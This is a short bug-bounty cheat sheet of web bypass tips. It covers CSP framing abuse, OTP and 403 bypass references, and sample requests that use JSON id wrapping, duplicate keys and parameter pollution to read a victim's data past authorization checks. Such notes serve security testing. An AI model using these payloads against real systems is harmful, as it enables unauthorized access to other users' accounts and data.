Bypasses
Last updated
Last updated
CSP Bypass, script-src 'self' data: - https://twitter.com/404death/status/1191222237782659072
OTP bypass - https://twitter.com/HackerHumble
Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ #bugbountytip
Cloudfront Bypass -
403 Bypass:
Tool -
Price Manipulation -
{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK
POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}
GET /api_v1/messages?user_id=VICTIM_ID --> 401
GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK